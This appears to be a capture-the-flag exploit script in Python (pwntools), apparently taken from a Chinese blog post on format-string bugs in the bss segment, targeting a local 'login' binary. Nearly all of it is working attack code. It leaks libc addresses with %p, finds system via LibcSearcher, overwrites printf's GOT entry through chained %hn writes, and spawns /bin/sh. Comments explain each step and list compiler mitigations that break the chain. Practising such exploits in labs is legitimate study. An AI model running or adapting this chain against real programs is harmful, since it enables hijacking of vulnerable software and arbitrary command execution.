bss上的格式化字符串漏洞

http://www.starssgo.top/2019/12/06/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%9C%A8bss%E6%AE%B5%E7%9A%84%E5%A4%84%E7%90%86/

 

from pwn import *

from LibcSearcher import *

# Spawn the target binary and parse its ELF image.  `elf` is loaded but not
# referenced anywhere later in this script (the one address it needs is
# hard-coded in the trailing comment instead); kept as written.
io = process('./login')
elf = ELF('./login')

# gdb.attach(io,'b *0x080485AA')

def change(n,k):
    """Send one ``%<n>c%<k>$hn`` line to the global ``io``.

    ``%<n>c`` pads printf's output to *n* characters and ``%<k>$hn`` then
    stores that running count as a 16-bit value through the pointer found
    at positional argument *k*.  The line is sent only after the
    ``'Try again!\\n'`` prompt has been received; nothing is returned.
    """
    spec = '%{pad}c%{pos}$hn'.format(pad=n, pos=k)
    io.sendlineafter('Try again!\n', spec)

# --- Interaction with the 'login' binary --------------------------------------
# What the payloads below evidently rely on:
#   * the "password" reaches printf() as its format string, so positional
#     %p reads and %hn writes against printf's arguments are possible;
#   * the GOT is writable (no full RELRO): the trailing comment records
#     printf's GOT entry at 0x0804b014, and that is what gets overwritten.
# Defender's view: -Wformat-security at build time, -D_FORTIFY_SOURCE=2
# (which rejects %n-family conversions in non-constant format strings), or
# full RELRO (-Wl,-z,relro,-z,now) each breaks this chain on its own.
io.sendlineafter('your name: \n','admin')
# Single leak line: AAAA / BBBB delimit two pointer reads (args 15 and 6).
io.sendlineafter('password: \n','AAAA%15$pBBBB%6$p')

io.recvuntil('AAAA')
# Arg 15 arrives as '0x' + 8 hex digits.  The script treats it as a pointer
# 247 bytes past __libc_start_main (presumably a return address into libc;
# the constant is libc-version specific -- confirm against the target).
__libc_start_main = int(io.recv(10),16) - 247
libc = LibcSearcher('__libc_start_main',__libc_start_main)
# libc base = leaked symbol address minus that symbol's offset in the matched libc.
offset = __libc_start_main - libc.dump('__libc_start_main')
success(hex(offset))
system = offset + libc.dump('system')
success(hex(system))

io.recvuntil('BBBB')
# Arg 6: a pointer value, used below as the base for the staging writes.
p = int(io.recv(10),16)

# Staging: four 2-byte writes via change().  hex(p)[6:10] is the low 16 bits
# of p only when hex(p) has exactly 8 digits (true for high addresses; a
# value below 0x10000000 would shift the slice).  The writes via arg 6
# apparently redirect the pointer read as arg 10, and the writes via arg 10
# then store 0xb014 / 0xb016 -- the low 16 bits of printf's GOT entry and of
# GOT+2 (see the comment at the end of the file).
change(int(hex(p)[6:10],16)-12,6)
change(int('b014',16),10)
change(int(hex(p)[6:10],16)+4,6)
change(int('b016',16),10)
# Final write: system's address split into its low (addr1) and high (addr2)
# 16-bit halves, stored through args 7 and 11 in one line.  The second %c
# count is the difference because %hn records printf's cumulative output
# length; as written this assumes addr2 > addr1 and 8-digit hex(system).
addr1=int(hex(system)[6:10],16)
addr2=int(hex(system)[2:6],16)
payload = '%'+str(addr1)+'c%7$hn'+'%'+str(addr2-addr1)+'c%11$hn'
io.sendlineafter('Try again!\n',payload)
# With printf's GOT entry now pointing at system, the next "password" string
# becomes the argument handed to it.
io.sendlineafter('Try again!\n','/bin/sh\x00')

io.interactive()
# printf positional arguments used above: 6 7 10 11 15
# printf_got: 0x0804b014  (the GOT entry overwritten with system's address)

 
